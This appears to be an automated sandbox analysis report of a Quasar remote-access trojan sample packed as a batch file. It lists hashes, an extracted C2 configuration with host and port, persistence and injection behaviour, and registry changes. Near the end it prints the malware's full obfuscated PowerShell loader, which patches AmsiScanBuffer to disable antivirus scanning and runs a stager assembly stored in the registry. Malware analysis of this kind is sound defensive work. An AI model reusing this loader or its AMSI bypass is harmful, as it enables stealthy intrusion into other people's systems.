quasar | cbe56ba5a86d713c4f57d42e3084f9879c379367c46054b805e85922e5654bf9

Analysis

max time kernel
94s
max time network
75s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
26-05-2024 19:38

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

$77-Built.bat
Size

3.5MB
MD5

297d7e65305917b5a212ca9f4b4d99d2
SHA1

402192fd3b13ea1fd26403e227ceb119e8569b4c
SHA256

cbe56ba5a86d713c4f57d42e3084f9879c379367c46054b805e85922e5654bf9
SHA512

6055d50144ca5a3e6c8889a659d63d654a3a84fb2be78ad36335d0877095592b7923e309c9d818ea9d5fc17a7d4f1b61c3318acddb9ea5041cf0fd996e27cb1a
SSDEEP

49152:cYbGAyBfhKnc19015vyfIchfKpcuGj8RmSMvANLFt/X9oS4ot3X3tLdDh:cG

Score

10^/10

quasar rootkit execution spyware trojan

Malware Config

Extracted

Family

quasar

Attributes

reconnect_delay
3000

Extracted

Family

quasar

Version

1.4.1

Botnet

Rootkit

uk2.localto.net:3444

Mutex

13b8023a-5596-4efa-b088-c87d2ca4e84f

Attributes

encryption_key
6BE0D74806BB58E6DB21FA6E3B6DB38B4A72BAFC
install_name
$77-powershell.exe
log_directory
$77-Logs
reconnect_delay
3000
startup_key
Discord
subdirectory
$77-Rootkit

Signatures

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar

Quasar payload 4 IoCs

Processes:

resource	yara_rule
behavioral1/memory/5028-29-0x00000266E79F0000-0x00000266E7E8E000-memory.dmp	family_quasar
behavioral1/memory/4224-118-0x0000020C7B110000-0x0000020C7B434000-memory.dmp	family_quasar
C:\Users\Admin\AppData\Local\Temp\Client-built.exe	family_quasar
behavioral1/memory/916-136-0x00000000009D0000-0x0000000000CF4000-memory.dmp	family_quasar

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

Processes:

powershell.EXE

description pid process target process

PID 4516 created 552 4516 powershell.EXE winlogon.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exe

pid process

5028 powershell.exe
1056 powershell.exe
4224 powershell.exe
Executes dropped EXE 2 IoCs

Processes:

Install.exeClient-built.exe

pid process

1376 Install.exe
916 Client-built.exe

description	pid	process	target process
PID 4516 created 552	4516	powershell.EXE	winlogon.exe

pid	process
1376	Install.exe
916	Client-built.exe

Drops file in System32 directory 2 IoCs

Processes:

powershell.EXE

description	ioc	process
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log	powershell.EXE

Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.EXE

description pid process target process

PID 4516 set thread context of 2792 4516 powershell.EXE dllhost.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exe

pid process

4548 schtasks.exe

description	pid	process	target process
PID 4516 set thread context of 2792	4516	powershell.EXE	dllhost.exe

pid	process
4548	schtasks.exe

Modifies data under HKEY_USERS 54 IoCs

Processes:

powershell.EXEsvchost.exeOfficeClickToRun.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR	OfficeClickToRun.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 50,1329 10,1329 15,1329 100,1329 6"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry	OfficeClickToRun.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache	OfficeClickToRun.exe

Modifies registry class 1 IoCs

Processes:

powershell.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings powershell.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings	powershell.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.EXEdllhost.exe

pid	process
5028	powershell.exe
5028	powershell.exe
5028	powershell.exe
1056	powershell.exe
1056	powershell.exe
1056	powershell.exe
4224	powershell.exe
4224	powershell.exe
4224	powershell.exe
4516	powershell.EXE
4516	powershell.EXE
4516	powershell.EXE
4516	powershell.EXE
2792	dllhost.exe
2792	dllhost.exe
2792	dllhost.exe
2792	dllhost.exe
2792	dllhost.exe
2792	dllhost.exe
2792	dllhost.exe
2792	dllhost.exe
2792	dllhost.exe
2792	dllhost.exe
2792	dllhost.exe
2792	dllhost.exe
2792	dllhost.exe
2792	dllhost.exe
2792	dllhost.exe
2792	dllhost.exe
2792	dllhost.exe
2792	dllhost.exe
2792	dllhost.exe
2792	dllhost.exe
2792	dllhost.exe
2792	dllhost.exe
2792	dllhost.exe
2792	dllhost.exe
2792	dllhost.exe
2792	dllhost.exe
2792	dllhost.exe
2792	dllhost.exe
2792	dllhost.exe
2792	dllhost.exe
2792	dllhost.exe
2792	dllhost.exe
2792	dllhost.exe
2792	dllhost.exe
2792	dllhost.exe
2792	dllhost.exe
2792	dllhost.exe
2792	dllhost.exe
2792	dllhost.exe
2792	dllhost.exe
2792	dllhost.exe
2792	dllhost.exe
2792	dllhost.exe
2792	dllhost.exe
2792	dllhost.exe
2792	dllhost.exe
2792	dllhost.exe
2792	dllhost.exe
2792	dllhost.exe
2792	dllhost.exe
2792	dllhost.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

Explorer.EXE

pid process

3352 Explorer.EXE

pid	process
3352	Explorer.EXE

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	5028	powershell.exe
Token: SeDebugPrivilege	1056	powershell.exe
Token: SeIncreaseQuotaPrivilege	1056	powershell.exe
Token: SeSecurityPrivilege	1056	powershell.exe
Token: SeTakeOwnershipPrivilege	1056	powershell.exe
Token: SeLoadDriverPrivilege	1056	powershell.exe
Token: SeSystemProfilePrivilege	1056	powershell.exe
Token: SeSystemtimePrivilege	1056	powershell.exe
Token: SeProfSingleProcessPrivilege	1056	powershell.exe
Token: SeIncBasePriorityPrivilege	1056	powershell.exe
Token: SeCreatePagefilePrivilege	1056	powershell.exe
Token: SeBackupPrivilege	1056	powershell.exe
Token: SeRestorePrivilege	1056	powershell.exe
Token: SeShutdownPrivilege	1056	powershell.exe
Token: SeDebugPrivilege	1056	powershell.exe
Token: SeSystemEnvironmentPrivilege	1056	powershell.exe
Token: SeRemoteShutdownPrivilege	1056	powershell.exe
Token: SeUndockPrivilege	1056	powershell.exe
Token: SeManageVolumePrivilege	1056	powershell.exe
Token: 33	1056	powershell.exe
Token: 34	1056	powershell.exe
Token: 35	1056	powershell.exe
Token: 36	1056	powershell.exe
Token: SeIncreaseQuotaPrivilege	1056	powershell.exe
Token: SeSecurityPrivilege	1056	powershell.exe
Token: SeTakeOwnershipPrivilege	1056	powershell.exe
Token: SeLoadDriverPrivilege	1056	powershell.exe
Token: SeSystemProfilePrivilege	1056	powershell.exe
Token: SeSystemtimePrivilege	1056	powershell.exe
Token: SeProfSingleProcessPrivilege	1056	powershell.exe
Token: SeIncBasePriorityPrivilege	1056	powershell.exe
Token: SeCreatePagefilePrivilege	1056	powershell.exe
Token: SeBackupPrivilege	1056	powershell.exe
Token: SeRestorePrivilege	1056	powershell.exe
Token: SeShutdownPrivilege	1056	powershell.exe
Token: SeDebugPrivilege	1056	powershell.exe
Token: SeSystemEnvironmentPrivilege	1056	powershell.exe
Token: SeRemoteShutdownPrivilege	1056	powershell.exe
Token: SeUndockPrivilege	1056	powershell.exe
Token: SeManageVolumePrivilege	1056	powershell.exe
Token: 33	1056	powershell.exe
Token: 34	1056	powershell.exe
Token: 35	1056	powershell.exe
Token: 36	1056	powershell.exe
Token: SeIncreaseQuotaPrivilege	1056	powershell.exe
Token: SeSecurityPrivilege	1056	powershell.exe
Token: SeTakeOwnershipPrivilege	1056	powershell.exe
Token: SeLoadDriverPrivilege	1056	powershell.exe
Token: SeSystemProfilePrivilege	1056	powershell.exe
Token: SeSystemtimePrivilege	1056	powershell.exe
Token: SeProfSingleProcessPrivilege	1056	powershell.exe
Token: SeIncBasePriorityPrivilege	1056	powershell.exe
Token: SeCreatePagefilePrivilege	1056	powershell.exe
Token: SeBackupPrivilege	1056	powershell.exe
Token: SeRestorePrivilege	1056	powershell.exe
Token: SeShutdownPrivilege	1056	powershell.exe
Token: SeDebugPrivilege	1056	powershell.exe
Token: SeSystemEnvironmentPrivilege	1056	powershell.exe
Token: SeRemoteShutdownPrivilege	1056	powershell.exe
Token: SeUndockPrivilege	1056	powershell.exe
Token: SeManageVolumePrivilege	1056	powershell.exe
Token: 33	1056	powershell.exe
Token: 34	1056	powershell.exe
Token: 35	1056	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

cmd.exepowershell.exeWScript.execmd.exepowershell.exepowershell.EXEdllhost.exe

description	pid	process	target process
PID 4388 wrote to memory of 5028	4388	cmd.exe	powershell.exe
PID 4388 wrote to memory of 5028	4388	cmd.exe	powershell.exe
PID 5028 wrote to memory of 1056	5028	powershell.exe	powershell.exe
PID 5028 wrote to memory of 1056	5028	powershell.exe	powershell.exe
PID 5028 wrote to memory of 1128	5028	powershell.exe	WScript.exe
PID 5028 wrote to memory of 1128	5028	powershell.exe	WScript.exe
PID 1128 wrote to memory of 3556	1128	WScript.exe	cmd.exe
PID 1128 wrote to memory of 3556	1128	WScript.exe	cmd.exe
PID 3556 wrote to memory of 4224	3556	cmd.exe	powershell.exe
PID 3556 wrote to memory of 4224	3556	cmd.exe	powershell.exe
PID 4224 wrote to memory of 1376	4224	powershell.exe	Install.exe
PID 4224 wrote to memory of 1376	4224	powershell.exe	Install.exe
PID 4224 wrote to memory of 1376	4224	powershell.exe	Install.exe
PID 4224 wrote to memory of 916	4224	powershell.exe	Client-built.exe
PID 4224 wrote to memory of 916	4224	powershell.exe	Client-built.exe
PID 4224 wrote to memory of 4548	4224	powershell.exe	schtasks.exe
PID 4224 wrote to memory of 4548	4224	powershell.exe	schtasks.exe
PID 4516 wrote to memory of 2792	4516	powershell.EXE	dllhost.exe
PID 4516 wrote to memory of 2792	4516	powershell.EXE	dllhost.exe
PID 4516 wrote to memory of 2792	4516	powershell.EXE	dllhost.exe
PID 4516 wrote to memory of 2792	4516	powershell.EXE	dllhost.exe
PID 4516 wrote to memory of 2792	4516	powershell.EXE	dllhost.exe
PID 4516 wrote to memory of 2792	4516	powershell.EXE	dllhost.exe
PID 4516 wrote to memory of 2792	4516	powershell.EXE	dllhost.exe
PID 4516 wrote to memory of 2792	4516	powershell.EXE	dllhost.exe
PID 2792 wrote to memory of 552	2792	dllhost.exe	winlogon.exe
PID 2792 wrote to memory of 632	2792	dllhost.exe	lsass.exe
PID 2792 wrote to memory of 724	2792	dllhost.exe	svchost.exe
PID 2792 wrote to memory of 900	2792	dllhost.exe	svchost.exe
PID 2792 wrote to memory of 1000	2792	dllhost.exe	dwm.exe
PID 2792 wrote to memory of 1016	2792	dllhost.exe	svchost.exe
PID 2792 wrote to memory of 356	2792	dllhost.exe	svchost.exe
PID 2792 wrote to memory of 380	2792	dllhost.exe	svchost.exe
PID 2792 wrote to memory of 716	2792	dllhost.exe	svchost.exe
PID 2792 wrote to memory of 1080	2792	dllhost.exe	svchost.exe
PID 2792 wrote to memory of 1088	2792	dllhost.exe	svchost.exe
PID 2792 wrote to memory of 1200	2792	dllhost.exe	svchost.exe
PID 2792 wrote to memory of 1212	2792	dllhost.exe	svchost.exe
PID 2792 wrote to memory of 1224	2792	dllhost.exe	svchost.exe
PID 2792 wrote to memory of 1236	2792	dllhost.exe	svchost.exe
PID 2792 wrote to memory of 1420	2792	dllhost.exe	svchost.exe
PID 2792 wrote to memory of 1436	2792	dllhost.exe	svchost.exe
PID 2792 wrote to memory of 1484	2792	dllhost.exe	svchost.exe
PID 2792 wrote to memory of 1524	2792	dllhost.exe	svchost.exe
PID 2792 wrote to memory of 1584	2792	dllhost.exe	svchost.exe
PID 2792 wrote to memory of 1636	2792	dllhost.exe	svchost.exe
PID 2792 wrote to memory of 1652	2792	dllhost.exe	svchost.exe
PID 2792 wrote to memory of 1756	2792	dllhost.exe	svchost.exe
PID 2792 wrote to memory of 1804	2792	dllhost.exe	svchost.exe
PID 2792 wrote to memory of 1816	2792	dllhost.exe	svchost.exe
PID 2792 wrote to memory of 1876	2792	dllhost.exe	svchost.exe
PID 2792 wrote to memory of 1896	2792	dllhost.exe	svchost.exe
PID 2792 wrote to memory of 2028	2792	dllhost.exe	spoolsv.exe
PID 2792 wrote to memory of 1764	2792	dllhost.exe	svchost.exe
PID 2792 wrote to memory of 2128	2792	dllhost.exe	svchost.exe
PID 2792 wrote to memory of 2304	2792	dllhost.exe	svchost.exe
PID 2792 wrote to memory of 2344	2792	dllhost.exe	svchost.exe
PID 2792 wrote to memory of 2356	2792	dllhost.exe	svchost.exe
PID 2792 wrote to memory of 2392	2792	dllhost.exe	svchost.exe
PID 2792 wrote to memory of 2528	2792	dllhost.exe	svchost.exe
PID 2792 wrote to memory of 2540	2792	dllhost.exe	svchost.exe
PID 2792 wrote to memory of 2572	2792	dllhost.exe	sysmon.exe
PID 2792 wrote to memory of 2596	2792	dllhost.exe	svchost.exe
PID 2792 wrote to memory of 2604	2792	dllhost.exe	svchost.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:552

C:\Windows\system32\dwm.exe
"dwm.exe"
2⤵
PID:1000

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{a9962185-de96-47e2-81e1-42ac93f7d47d}
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2792

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:632

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay
1⤵
PID:724

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s LSM
1⤵
PID:900

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
1⤵
PID:1016

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s DsmSvc
1⤵
PID:356

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService
1⤵
PID:380

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts
1⤵
PID:716

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Schedule
1⤵
PID:1080

c:\windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
2⤵
PID:3148

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:saqiUXlVcqAq{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$PSLaSDpbXJXEtw,[Parameter(Position=1)][Type]$vqZhVhUbcV)$WdpJNpaSkaF=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+[Char](102)+''+[Char](108)+'e'+[Char](99)+''+'t'+''+[Char](101)+'d'+[Char](68)+''+[Char](101)+''+[Char](108)+''+[Char](101)+''+'g'+''+[Char](97)+'t'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+'n'+''+[Char](77)+''+[Char](101)+'m'+'o'+''+'r'+'y'+[Char](77)+'odu'+[Char](108)+'e',$False).DefineType(''+[Char](77)+''+[Char](121)+'D'+[Char](101)+''+[Char](108)+'e'+[Char](103)+''+[Char](97)+''+[Char](116)+'e'+[Char](84)+''+[Char](121)+'p'+'e'+'',''+[Char](67)+''+'l'+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+'Pu'+[Char](98)+''+'l'+''+'i'+''+'c'+''+[Char](44)+''+[Char](83)+''+[Char](101)+''+'a'+''+'l'+''+[Char](101)+''+'d'+''+','+''+[Char](65)+''+[Char](110)+''+[Char](115)+''+[Char](105)+''+'C'+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+''+[Char](44)+''+[Char](65)+''+[Char](117)+''+[Char](116)+'oC'+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$WdpJNpaSkaF.DefineConstructor(''+'R'+''+'T'+''+[Char](83)+''+[Char](112)+''+'e'+''+'c'+'i'+'a'+'l'+'N'+''+'a'+''+[Char](109)+'e'+[Char](44)+'H'+'i'+''+[Char](100)+''+[Char](101)+''+[Char](66)+'y'+'S'+''+[Char](105)+''+[Char](103)+','+[Char](80)+''+[Char](117)+''+'b'+''+'l'+''+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$PSLaSDpbXJXEtw).SetImplementationFlags(''+'R'+''+[Char](117)+'n'+[Char](116)+'ime,'+[Char](77)+''+[Char](97)+'n'+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$WdpJNpaSkaF.DefineMethod(''+'I'+'n'+[Char](118)+''+[Char](111)+'k'+'e'+'','Pu'+[Char](98)+'l'+'i'+'c,'+[Char](72)+''+'i'+''+[Char](100)+''+[Char](101)+'B'+[Char](121)+''+[Char](83)+''+'i'+''+[Char](103)+''+[Char](44)+'N'+[Char](101)+'w'+[Char](83)+''+[Char](108)+''+[Char](111)+'t'+[Char](44)+''+[Char](86)+'i'+[Char](114)+'tua'+[Char](108)+'',$vqZhVhUbcV,$PSLaSDpbXJXEtw).SetImplementationFlags('Ru'+'n'+''+'t'+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+'M'+''+'a'+''+[Char](110)+'a'+'g'+''+[Char](101)+''+[Char](100)+'');Write-Output $WdpJNpaSkaF.CreateType();}$JNxYBubUArsrC=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+'s'+[Char](116)+''+'e'+''+[Char](109)+''+'.'+''+[Char](100)+'l'+[Char](108)+'')}).GetType(''+[Char](77)+''+'i'+'c'+'r'+''+'o'+''+'s'+''+[Char](111)+'f'+[Char](116)+'.'+'W'+''+[Char](105)+''+[Char](110)+''+[Char](51)+''+'2'+''+[Char](46)+'U'+[Char](110)+''+[Char](115)+''+[Char](97)+''+[Char](102)+'e'+'N'+'a'+[Char](116)+''+[Char](105)+''+[Char](118)+''+[Char](101)+''+'M'+''+[Char](101)+''+[Char](116)+'h'+[Char](111)+''+'d'+''+[Char](115)+'');$czVTGRviZAoAEU=$JNxYBubUArsrC.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+[Char](80)+''+[Char](114)+''+[Char](111)+''+'c'+''+[Char](65)+''+[Char](100)+''+[Char](100)+'r'+'e'+''+[Char](115)+'s',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+'c'+[Char](44)+'St'+'a'+''+[Char](116)+''+[Char](105)+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$taeCbgsaORVduzLIRuU=saqiUXlVcqAq @([String])([IntPtr]);$ZcjYYgiyfiVsXqKtVykqyV=saqiUXlVcqAq @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$enDmrgitdIj=$JNxYBubUArsrC.GetMethod(''+'G'+''+[Char](101)+''+'t'+''+[Char](77)+''+[Char](111)+''+'d'+'u'+[Char](108)+''+'e'+''+'H'+'a'+'n'+''+[Char](100)+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+'k'+''+'e'+''+[Char](114)+'n'+'e'+'l'+[Char](51)+''+[Char](50)+''+'.'+'d'+[Char](108)+'l')));$UUoaRuoLlSfFLX=$czVTGRviZAoAEU.Invoke($Null,@([Object]$enDmrgitdIj,[Object](''+'L'+''+'o'+'a'+'d'+'L'+'i'+'b'+[Char](114)+''+[Char](97)+'r'+[Char](121)+''+[Char](65)+'')));$zqSyzybdBtgskHbak=$czVTGRviZAoAEU.Invoke($Null,@([Object]$enDmrgitdIj,[Object](''+[Char](86)+''+[Char](105)+''+[Char](114)+''+'t'+''+'u'+'al'+[Char](80)+''+'r'+''+[Char](111)+'te'+[Char](99)+'t')));$gibEDTV=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($UUoaRuoLlSfFLX,$taeCbgsaORVduzLIRuU).Invoke(''+[Char](97)+''+[Char](109)+''+[Char](115)+'i'+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'');$IOXeJSTBLGjtKZhkP=$czVTGRviZAoAEU.Invoke($Null,@([Object]$gibEDTV,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+[Char](83)+''+[Char](99)+''+'a'+''+[Char](110)+''+[Char](66)+''+[Char](117)+'f'+[Char](102)+''+[Char](101)+'r')));$SzEoKryFvd=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($zqSyzybdBtgskHbak,$ZcjYYgiyfiVsXqKtVykqyV).Invoke($IOXeJSTBLGjtKZhkP,[uint32]8,4,[ref]$SzEoKryFvd);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$IOXeJSTBLGjtKZhkP,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($zqSyzybdBtgskHbak,$ZcjYYgiyfiVsXqKtVykqyV).Invoke($IOXeJSTBLGjtKZhkP,[uint32]8,0x20,[ref]$SzEoKryFvd);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+''+'F'+''+[Char](84)+'W'+[Char](65)+''+'R'+''+'E'+'').GetValue(''+[Char](36)+''+'7'+''+[Char](55)+'s'+[Char](116)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"
2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4516

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog
1⤵
